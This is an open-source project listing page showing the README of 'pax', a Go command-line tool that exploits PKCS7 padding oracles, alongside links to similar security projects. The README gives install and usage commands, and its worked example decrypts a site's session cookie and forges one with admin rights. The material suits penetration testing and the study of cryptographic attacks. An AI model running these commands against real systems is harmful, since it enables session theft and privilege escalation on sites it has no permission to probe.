All Projects â†’ liamg â†’ Pax

liamg / Pax

Licence: mit
💀 🔓 CLI tool for PKCS7 padding oracle attacks

Programming Languages

go
31211 projects - #10 most used programming language

Projects that are alternatives of or similar to Pax

Padding Oracle Attack
🔓 Padding oracle attack against PKCS7 🔓
Stars: ✭ 209 (+132.22%)
Mutual labels:  oracle, attack
Apt
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )
Stars: ✭ 83 (-7.78%)
Mutual labels:  attack
Mhddos
Best DDoS Attack Script Python3, Cyber Attack With 36 Method
Stars: ✭ 55 (-38.89%)
Mutual labels:  attack
Biemond Orawls
Puppet 3/4 module for WebLogic provisioning module ( Linux & Solaris )
Stars: ✭ 63 (-30%)
Mutual labels:  oracle
Ctfsubmitter
A flag submitter service with distributed attackers for attack/defense CTF games.
Stars: ✭ 56 (-37.78%)
Mutual labels:  attack
Zabbixdba
Zabbix Database Monitoring Service (Oracle, Pg, MySQL, MS SQL, DB2, etc.)
Stars: ✭ 68 (-24.44%)
Mutual labels:  oracle
Ddlparse
DDL parase and Convert to BigQuery JSON schema and DDL statements
Stars: ✭ 52 (-42.22%)
Mutual labels:  oracle
Dbwebapi
(Migrated from CodePlex) DbWebApi is a .Net library that implement an entirely generic Web API (RESTful) for HTTP clients to call database (Oracle & SQL Server) stored procedures or functions in a managed way out-of-the-box without any configuration or coding.
Stars: ✭ 84 (-6.67%)
Mutual labels:  oracle
Chloe
A lightweight and high-performance Object/Relational Mapping(ORM) library for .NET --C#
Stars: ✭ 1,248 (+1286.67%)
Mutual labels:  oracle
Docker Oracle12c
Docker image for Oracle Database 12c
Stars: ✭ 63 (-30%)
Mutual labels:  oracle
Esp8266 deauther
Affordable WiFi hacking platform for testing and learning
Stars: ✭ 9,312 (+10246.67%)
Mutual labels:  attack
Apex Plugin Dropzone
Oracle APEX Region Plugin - Dropzone
Stars: ✭ 56 (-37.78%)
Mutual labels:  oracle
Ebean
Ebean ORM
Stars: ✭ 1,172 (+1202.22%)
Mutual labels:  oracle
Ska
Simple Karma Attack
Stars: ✭ 55 (-38.89%)
Mutual labels:  attack
Pywsus
Standalone implementation of a part of the WSUS spec. Built for offensive security purposes.
Stars: ✭ 84 (-6.67%)
Mutual labels:  attack
Eddsa Fault Attack
Fault attack agaisnt EdDSA demonstrated on an Arduino Nano board, allowing for partial key recovery and fake signatures.
Stars: ✭ 53 (-41.11%)
Mutual labels:  attack
Google Chinese Handwriting Ime
Written in Electron for Linux.
Stars: ✭ 58 (-35.56%)
Mutual labels:  attack
Hospital Management System
JavaEE web application Discuss how to build Full java web app big system from scratch to Professional
Stars: ✭ 64 (-28.89%)
Mutual labels:  oracle
Dockerfiles
Just some Dockerfiles I'm playing around with.
Stars: ✭ 88 (-2.22%)
Mutual labels:  oracle
Contracts
Band Protocol's Solidity smart contracts
Stars: ✭ 85 (-5.56%)
Mutual labels:  oracle

pax

Travis Build Status GoReportCard

Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!

Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].